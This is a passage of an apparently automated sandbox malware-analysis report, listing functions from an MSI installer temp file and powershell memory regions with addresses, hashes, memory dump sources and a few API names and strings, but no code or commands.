                                                                                                                                                                                                                                                    • Instruction ID: 34abe92f78c0b800613a61ac53095d1868d856e6ad231df3a096c9685491642d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 867b516eb8bbdf87a1c2c6b2c9181f8ed7436badd309d8f4accec465851d6def
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 49512836A1CB41C6E720BF15A44026EB7B4FB88B94F500575EB8D07B95DF38E4A1CB10
                                                                                                                                                                                                                                                    Function 00007FF749F8BFD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 108COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                                    • String ID: C:\Windows\Installer\MSI64FB.tmp
                                                                                                                                                                                                                                                    • API String ID: 3307058713-4156019801
                                                                                                                                                                                                                                                    • Opcode ID: bba960e90264ebfad4bd95cdfef2176eeb6c49412b1f78af46d9714a3a8b1c9a
                                                                                                                                                                                                                                                    • Instruction ID: 48ad832148caf7aa866610e1ef109317b9976753b907ed677207de320f277f3a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bba960e90264ebfad4bd95cdfef2176eeb6c49412b1f78af46d9714a3a8b1c9a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C41AE36A0CA02C9EB94FF25A8500B9E3B4EF447D4B954036EA0E57BC5EF3DE4858360
                                                                                                                                                                                                                                                    Function 00007FF749F9B44C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                    • String ID: U
                                                                                                                                                                                                                                                    • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                    • Opcode ID: f91bdc684d2395d32e54d8b7256bcfcf0c42bafe7cf999af2e1683b32de0ca03
                                                                                                                                                                                                                                                    • Instruction ID: 67cfa8e14a791d1765dd281e82df4779c0309c5d664bd681c58cbcea8b91b226
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f91bdc684d2395d32e54d8b7256bcfcf0c42bafe7cf999af2e1683b32de0ca03
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2A41B362A2DA81CAD720BF29E4447AAA7B0FB49784F904131EA4D87798EF7CD441C760
                                                                                                                                                                                                                                                    Function 00007FF749F42CA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLocal$_invalid_parameter_noinfo_noreturn
                                                                                                                                                                                                                                                    • String ID: vector too long
                                                                                                                                                                                                                                                    • API String ID: 2955324198-2873823879
                                                                                                                                                                                                                                                    • Opcode ID: 5da7785276cff46d836ca9d529bdaae2f4e925051c82b1f9a81f8b146af783fb
                                                                                                                                                                                                                                                    • Instruction ID: 82d777dc25b5a14bb8de0df68b1f98a50be0a57732bc6305463c5289b77bed77
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5da7785276cff46d836ca9d529bdaae2f4e925051c82b1f9a81f8b146af783fb
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D5016D21B5AA45C4EF08FFB9D8552BCA2B0AF54BA8F944A31DA2D463D5DF2CD4908320
                                                                                                                                                                                                                                                    Function 00007FF749F4C870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::_$Locinfo::_Locinfo_ctorLockitLockit::_
                                                                                                                                                                                                                                                    • String ID: bad locale name
                                                                                                                                                                                                                                                    • API String ID: 3988782225-1405518554
                                                                                                                                                                                                                                                    • Opcode ID: ff4bfb7af1a39cdc8712dbd924c773a99782365ab42b7c759bc4d989940ead36
                                                                                                                                                                                                                                                    • Instruction ID: bc1d06d1cdd16f1467af4fd7faac68c7c6f6fdb0f1761c44a4c879bce6fa5c33
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ff4bfb7af1a39cdc8712dbd924c773a99782365ab42b7c759bc4d989940ead36
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BD016223509B81D9D748EF75A840158B7B5FB58B987685239CA8D8375EEF38C590C350
                                                                                                                                                                                                                                                    Function 00007FF749F79E34 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF749F52BC6), ref: 00007FF749F79E84
                                                                                                                                                                                                                                                    • RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF749F52BC6), ref: 00007FF749F79EC5
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                                                                    • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                    • Opcode ID: e981e9375f5199886df9adb2645ac098046de6b51e66eaec7fe24d2fd6eccca5
                                                                                                                                                                                                                                                    • Instruction ID: d21abc3d8100134570c29014f26d04d134a059c2c0369da5a0dcedb658edb328
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e981e9375f5199886df9adb2645ac098046de6b51e66eaec7fe24d2fd6eccca5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2511EC3261CB4182EB61AF15E440269B7F5FB88B94F684275EF8D07BA8DF3CD5518710
                                                                                                                                                                                                                                                    Function 00007FF749F47E80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000004.00000002.1889766961.00007FF749F41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF749F40000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889745847.00007FF749F40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889822947.00007FF749FA2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889852421.00007FF749FBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000004.00000002.1889892267.00007FF749FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_4_2_7ff749f40000_MSI64FB.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ConvertFreeLocalString
                                                                                                                                                                                                                                                    • String ID: Invalid SID
                                                                                                                                                                                                                                                    • API String ID: 3201929900-130637731
                                                                                                                                                                                                                                                    • Opcode ID: 4d0ccbe9cd87c67762e3f45dff726abbddade60e00e70dc2fdb163d8ac8d1d79
                                                                                                                                                                                                                                                    • Instruction ID: f676997c7c5fafe2272208d0e2184535e2cf55512157de9668883bb2efeb1782
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d0ccbe9cd87c67762e3f45dff726abbddade60e00e70dc2fdb163d8ac8d1d79
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1113072A1C741C2EB14AF11F540569E2B0FB94B94F805335EAA9077D8DF7CD1508750

                                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                                    Function 00007FFD9B4B41B1 Relevance: .8, Instructions: 767COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2130991519.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: dc1f1049a5fe23ab2eab0d4e73b558fd56eabd8cdbeb9d9d4f833aeade5494f9
                                                                                                                                                                                                                                                    • Instruction ID: 30a4dff25ca1deb538b4330a9ac77e414840ad7bb5eaf77d3cfb405eb515ca52
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: dc1f1049a5fe23ab2eab0d4e73b558fd56eabd8cdbeb9d9d4f833aeade5494f9
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8E222962B0E7D90FE7AA876858355783FD0EF52324B0A01FFD199CB0E3D9186D069782
                                                                                                                                                                                                                                                    Function 00007FFD9B690132 Relevance: .5, Instructions: 523COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2135794305.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b690000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 1c5fd734400e960e8fcffaa3aeee35cbd54fb5efddc5a793df1e8fe05e2e89b2
                                                                                                                                                                                                                                                    • Instruction ID: 5bb157f52d947b684edce7841997286f0cd3f7a381c8b1c04c45bd5b5723a14e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c5fd734400e960e8fcffaa3aeee35cbd54fb5efddc5a793df1e8fe05e2e89b2
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6F1F862B0EB8A4FE7A99B6848715757BD1EF55B10B0900FED06DCB1E3EE19BC058341
                                                                                                                                                                                                                                                    Function 00007FFD9B690B52 Relevance: .5, Instructions: 494COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2135794305.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b690000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 0903e2e740332e71f005d2c77e7b2efa2c90922869f9fcd473c102afa927ff04
                                                                                                                                                                                                                                                    • Instruction ID: c69f79d4f1abe0ab0646220864c60c790da359446325d977b5febb8ef287ab2e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0903e2e740332e71f005d2c77e7b2efa2c90922869f9fcd473c102afa927ff04
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41E11762B0EA894FEBA9DB6844606747BE1EF55B10B1900FBD06CCB1E7EE19BC45C341
                                                                                                                                                                                                                                                    Function 00007FFD9B3EA425 Relevance: .5, Instructions: 474COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e2260aa269570e1436e8612411708ba6274df584ecf60b4a3985e168e43a0f5a
                                                                                                                                                                                                                                                    • Instruction ID: c571f6ec55259e6e300ef7ba04171bb74eb014d04207a88abf1cacf0b2a74e42
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e2260aa269570e1436e8612411708ba6274df584ecf60b4a3985e168e43a0f5a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5991E862A1F6DA0FE712ABAC9CB55D57FA0FF1221870D01FBC1D9CB0A3ED0425468752
                                                                                                                                                                                                                                                    Function 00007FFD9B4B67BA Relevance: .5, Instructions: 471COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2130991519.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: bd47bc36121932315acbb7a2ed7c265a409471ea9219a78153d0414f07771856
                                                                                                                                                                                                                                                    • Instruction ID: e6e1446223496a0012f96bedbe2944c35b44c9be1f857128ba789fe3cd748e7e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: bd47bc36121932315acbb7a2ed7c265a409471ea9219a78153d0414f07771856
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2ED15822B0FA9D0FEB69DBA848755B9BBA1EF15314B0901FED14DCB0E3D928E905C741
                                                                                                                                                                                                                                                    Function 00007FFD9B3ED221 Relevance: .5, Instructions: 451COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3aef9d6fd0767b9119ff5fc03e2c8e09148cf5e0e4a330a37a8cef639153af60
                                                                                                                                                                                                                                                    • Instruction ID: 691132f0c4657a5ba90bd98c90e5a231282977bdfa10eca00fa3250a1ba76b98
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3aef9d6fd0767b9119ff5fc03e2c8e09148cf5e0e4a330a37a8cef639153af60
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 65F1A231A19A4D8FDF99EF58C465AE97BE1FF68300F1541AEE409D7296CB34E841CB80
                                                                                                                                                                                                                                                    Function 00007FFD9B690250 Relevance: .4, Instructions: 358COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2135794305.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b690000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 736705a033b75784a451648688ff06c862c6911d533d05057f1cf53570c27d64
                                                                                                                                                                                                                                                    • Instruction ID: 961d1fe41b5468bf851f4253cd321516445deb3ffef01b5420131cf0efed5fb6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 736705a033b75784a451648688ff06c862c6911d533d05057f1cf53570c27d64
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 20C1D862A1FA8A4FEBA59B6848715747AD1EF55B10F1A00FED06DCB1E3EE18BC058341
                                                                                                                                                                                                                                                    Function 00007FFD9B690CF8 Relevance: .3, Instructions: 255COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2135794305.00007FFD9B690000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B690000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b690000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: aba6aaf1e99411cd3a57376b15ad7dc23760cda40b10a46e2c5d6361e7a3ebf5
                                                                                                                                                                                                                                                    • Instruction ID: c6b99fcdcdc644ae59902bb7de3d3149759f127c4a08f796a04c879b56433cc8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: aba6aaf1e99411cd3a57376b15ad7dc23760cda40b10a46e2c5d6361e7a3ebf5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC810662B0FA8A1FE7A9DB6844706647AD1EF55B10B1A00FED06CCB1E3DE19BD458341
                                                                                                                                                                                                                                                    Function 00007FFD9B4B6810 Relevance: .2, Instructions: 244COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2130991519.00007FFD9B4B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4B0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b4b0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e50f641c6de2ba8e389b7b1b5d82cd1d9f5bc87d619cc7586a8e66a58a649ea8
                                                                                                                                                                                                                                                    • Instruction ID: 3e1f0cee3fa882044a3317a4fd8a592bad410715bf4d5c8c7e465f5d02de1c32
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e50f641c6de2ba8e389b7b1b5d82cd1d9f5bc87d619cc7586a8e66a58a649ea8
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 33710962F0FA9A0FEBB9DB684471578B6E1EF55344B1900BEC14DCB0E3D929ED049B41
                                                                                                                                                                                                                                                    Function 00007FFD9B3EA858 Relevance: .2, Instructions: 215COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: d41eb407f5e706b5994ea7d49eeef42c00a9bc26663dba937b2333d6a198d476
                                                                                                                                                                                                                                                    • Instruction ID: e067936f5df7342c7e1983a1e5f30ec97ee1e7b0fbbad3e7a28dd4773ab9ee7d
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: d41eb407f5e706b5994ea7d49eeef42c00a9bc26663dba937b2333d6a198d476
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DC51F931A1CB4C8FDB5CEB5C9C4A6E9BBE0EB95321F04426FD449C3252DA706856CBD2
                                                                                                                                                                                                                                                    Function 00007FFD9B3E9D25 Relevance: .1, Instructions: 146COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 697071d2e060187dcad5cd37781ce6ec7b9bb6a5a027de9141c083f53110e8b3
                                                                                                                                                                                                                                                    • Instruction ID: 61643dfe0f0c0adf0ed7cf145da935ccacae298f5598d882fe164f4b05260571
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 697071d2e060187dcad5cd37781ce6ec7b9bb6a5a027de9141c083f53110e8b3
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1041F931A0CB484FD71DDB9CA84A6B9BBE0FB55321F00426FD04983592CB757456CBC2
                                                                                                                                                                                                                                                    Function 00007FFD9B3E9BFB Relevance: .1, Instructions: 139COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000009.00000002.2129852751.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9b3e0000_powershell.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: 3319161998104389a74d9ad10bd6a8dba063890bbe4dbc320d218930206b33f5
                                                                                                                                                                                                                                                    • Instruction ID: 2ddc86812f01aa83b42b9c4b0789d8ac69b5fd704bccc50faad1d3c436c7bb16
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3319161998104389a74d9ad10bd6a8dba063890bbe4dbc320d218930206b33f5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5641F831A1DA9C4FD758EB5C9C1A6B9BBE0FB95310F04426FD48C83192DA30A955CBC2
                                                                                                                                                                                                                                                    Function 00007FFD9B2CE620 Relevance: .1, Instructions: 125COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    Memory Dump Source
